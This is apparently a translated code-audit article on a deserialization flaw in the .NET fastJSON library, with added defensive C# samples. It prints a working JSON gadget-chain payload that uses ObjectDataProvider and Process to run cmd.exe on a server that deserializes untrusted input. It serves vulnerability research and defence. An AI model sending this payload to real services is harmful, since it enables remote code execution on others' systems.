.NET advanced code audit (third class): Fastjson deserialization vulnerability

ID MYHACK58:62201993129
Type myhack58
Reporter 佚名
Modified 2019-03-13T00:00:00


Fastjson for Java has suffered multiple deserialization vulnerabilities and bypass variants over the years, and the .NET world also has a fastJSON library. Its author officially describes it as the most efficient JSON read/write component for .NET: the built-in JSON.ToJSON method quickly serializes .NET objects and lets you convert between any .NET type (objects, primitive types, and so on) and JSON. fastJSON is an open-source JSON library for .NET, available from http://www.codeproject.com/Articles/159450/fastJSON; its detailed deserialization performance comparison is as follows:

[figure: performance comparison]

The chart shows a clear speed and performance advantage over established libraries such as Json.NET, Stack and others. The reason is that the component's author uses reflection to generate a large amount of IL code; IL is managed code that can be compiled directly at run time, so performance improves greatly in this respect. However, in some scenarios developers use the JSON.ToObject method to deserialize untrusted data, which creates a deserialization vulnerability that enables remote code execution (RCE). This article describes and reproduces the issue from the perspective of the underlying principle and of code audit.

0x01 Fastjson serialization

Using JSON.ToJSON makes it very easy to convert .NET objects to JSON data. ToJSON first obtains the fully qualified name of the object's type in the assembly and stores it as the value of the $types key; it then converts the names of the object's members into keys in the JSON data and the members' values into the corresponding JSON values. The following example illustrates this. First, define the TestClass object:

[figure: TestClass definition]

It defines three members and implements a static method, ClassMethod, that starts a process. Serialization creates an object instance and assigns a value to each member:

[figure: serialization code]

To make sure the serialization process does not throw an exception, the author uses the second parameter of JSON.ToJSON and instantiates a JSONParameters object; many of its fields are Boolean:

[figure: JSONParameters fields]

The field relevant to the deserialization vulnerability is UseExtensions: setting it to true causes the fully qualified class name to be emitted. If null values do not need to be serialized, the other field, SerializeNullValues, is set to false. The JSON data I obtained after serializing with JSON.ToJSON is:

{"$types":{"WpfApp1.TestClass, WpfApp1, Version=, Culture=neutral, PublicKeyToken=null":"1"},"$type":"1","Classname":"360","Name":"Ivan1ee","Age":18}
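The following is an added example, not code from the original article or from the fastJSON project. It serializes a stand-in TestClass twice to show that the $types/$type hints the article points at come entirely from JSONParameters.UseExtensions; it assumes the fastJSON package is referenced and that TestClass lives in the example's own namespace (so the emitted name differs from the article's WpfApp1.TestClass).

```csharp
// Added example: how JSONParameters.UseExtensions controls whether fastJSON emits
// the $types/$type hints that later drive type resolution on the deserializing side.
// Assumes the fastJSON NuGet package is referenced.
using System;
using fastJSON;

namespace FastJsonAudit
{
    // Stand-in for the article's TestClass (constructed for this example).
    public class TestClass
    {
        public string Classname { get; set; }
        public string Name { get; set; }
        public int Age { get; set; }
    }

    public static class SerializeDemo
    {
        // Serialize with type hints: the output carries a "$types" map and a "$type" key.
        public static string WithTypeHints(TestClass obj)
        {
            var p = new JSONParameters
            {
                UseExtensions = true,        // emit assembly-qualified type names
                SerializeNullValues = false  // skip members whose value is null
            };
            return JSON.ToJSON(obj, p);
        }

        // Serialize without type hints: plain JSON with no assembly-qualified names,
        // so a consumer has nothing to resolve except the type it explicitly asks for.
        public static string WithoutTypeHints(TestClass obj)
        {
            var p = new JSONParameters
            {
                UseExtensions = false,
                SerializeNullValues = false
            };
            return JSON.ToJSON(obj, p);
        }

        public static void Main()
        {
            var t = new TestClass { Classname = "360", Name = "Ivan1ee", Age = 18 };

            // Contains "$types":{"FastJsonAudit.TestClass, <assembly>, Version=..., ...":"1"},"$type":"1",...
            Console.WriteLine(WithTypeHints(t));

            // {"Classname":"360","Name":"Ivan1ee","Age":18}
            Console.WriteLine(WithoutTypeHints(t));

            // Audit check: flag every code path that serializes with UseExtensions = true
            // and later deserializes data a client is able to alter.
            Console.WriteLine(WithTypeHints(t).Contains("$types")
                ? "type hints present" : "no type hints");
        }
    }
}
```

When auditing, grep for JSONParameters construction sites and for UseExtensions; a value of true on data that crosses a trust boundary is the condition the rest of this article builds on.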

0x02 Fastjson deserialization

2.1 Deserialization usage

Deserialization converts JSON data back into an object. Fastjson does this by creating a new object through the JSON.ToObject method. ToObject has several overloads; when two parameters are passed, the first is the data to be deserialized and the second is the JSONParameters configuration object, which makes deserialization follow the specified attribute values. The overloads are shown in the following figure:

[figure: ToObject overloads]

The specific code can refer to the following demo:

[figure: deserialization demo]

2.2 Building the PoC

The vulnerability trigger point is whether $types in the serialized JSON can be controlled; the official documentation also carries a warning about this.

[figure: official documentation warning]

The author again chooses the ObjectDataProvider class, which makes it easy to call any method of a referenced class; for the details of this usage see ".NET advanced code audit (first lesson): XmlSerializer deserialization vulnerability". Because Process.Start needs the related attributes of the ProcessStartInfo class to be configured before it starts a process, such as the file name and the start-up arguments, the serialization of ProcessStartInfo has to be considered first. The demo code is as follows:

[figure: ProcessStartInfo serialization demo]

Step by step: GetType obtains the type of the current instance and returns a Type variable t3; Type.GetProperty then finds the public property FileName and the result is assigned to a PropertyInfo variable propertyName; PropertyInfo.SetValue then sets the value of that property on the object to "cmd.exe", and the Arguments property is given its value in the same way. The next step is to serialize the Process class and call StartInfo to start the program; the demo is as follows:

[figure: Process serialization demo]

Then subtraction is needed: remove the redundant System.RuntimeType and System.IntPtr data, which yields the final deserialization payload:
{"$types":{"System.Windows.Data.ObjectDataProvider, Contains, Version=, Culture=neutral, PublicKeyToken=31bf3856ad364e35":"1","System.Diagnostics.Process, System, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089":"3","System.Diagnostics.ProcessStartInfo, System, Version=, Culture=neutral, PublicKeyToken=b77a5c561934e089":"5"},"$type":"1","ObjectInstance":{"$type":"3","StartInfo":{"$type":"5","Verb":"","Arguments":"/c calc.exe","CreateNoWindow":false,"RedirectStandardInput":false,"RedirectStandardOutput":false,"RedirectStandardError":false,"UseShellExecute":true,"UserName":"","Domain":"","LoadUserProfile":false,"FileName":"cmd.exe","WorkingDirectory":"","ErrorDialog":false,"WindowStyle":"Normal"},"EnableRaisingEvents":false},"MethodName":"Start","IsAsynchronous":false,"IsInitialLoadEnabled":true}
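The following is an added example, not code from the original article or from the fastJSON project, written from the defender's side of the trigger point described in 2.2. Because the $type/$types hints in the document steer which class fastJSON instantiates, the guard parses untrusted input into a plain object graph first (JSON.Parse produces only Dictionary<string, object>, List<object> and primitives and instantiates no application types), refuses any document that carries type hints, and only then binds to the expected type. It assumes the fastJSON package is referenced; the two inputs are constructed for the example, and the type name in the second one is a placeholder, not a real gadget.

```csharp
// Added example: a pre-deserialization gate for untrusted fastJSON input.
// Assumes the fastJSON NuGet package is referenced. Sample inputs are constructed.
using System;
using System.Collections.Generic;
using fastJSON;

namespace FastJsonAudit
{
    // Stand-in for the article's TestClass (constructed for this example).
    public class TestClass
    {
        public string Classname { get; set; }
        public string Name { get; set; }
        public int Age { get; set; }
    }

    public static class SafeDeserialize
    {
        // Recursively walk the parsed graph looking for fastJSON's type-hint keys at any depth.
        public static bool ContainsTypeHint(object node)
        {
            switch (node)
            {
                case Dictionary<string, object> dict:
                    foreach (var kv in dict)
                    {
                        if (kv.Key == "$type" || kv.Key == "$types") return true;
                        if (ContainsTypeHint(kv.Value)) return true;
                    }
                    return false;
                case List<object> list:
                    foreach (var item in list)
                        if (ContainsTypeHint(item)) return true;
                    return false;
                default:
                    return false; // string, number, bool or null: nothing to resolve
            }
        }

        // Bind untrusted JSON to T, refusing documents that try to steer type resolution.
        public static T FromUntrusted<T>(string json)
        {
            object graph = JSON.Parse(json); // builds dictionaries/lists only, no type lookup
            if (ContainsTypeHint(graph))
                throw new InvalidOperationException("rejected: input carries $type/$types hints");
            return JSON.ToObject<T>(json);
        }

        public static void Main()
        {
            // Constructed benign input: no hints, binds normally.
            string benign = "{\"Classname\":\"360\",\"Name\":\"Ivan1ee\",\"Age\":18}";
            TestClass ok = FromUntrusted<TestClass>(benign);
            Console.WriteLine($"bound: {ok.Name}, {ok.Age}");

            // Constructed hint-carrying input with a placeholder type name: it is refused
            // before fastJSON ever tries to resolve that name.
            string hinted = "{\"$types\":{\"Placeholder.Type, PlaceholderAssembly\":\"1\"},\"$type\":\"1\",\"Name\":\"x\"}";
            try
            {
                FromUntrusted<TestClass>(hinted);
            }
            catch (InvalidOperationException e)
            {
                Console.WriteLine(e.Message); // rejected: input carries $type/$types hints
            }
        }
    }
}
```

The check is on key names, which is exactly what fastJSON keys on, so it does not depend on knowing any particular gadget class; an allow-list of expected root types is the complementary control if a feature genuinely needs polymorphic input. Later fastJSON releases also added a built-in black-list check on resolved type names; treat that as defence in depth rather than the primary control, and confirm it is present in the version under audit.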
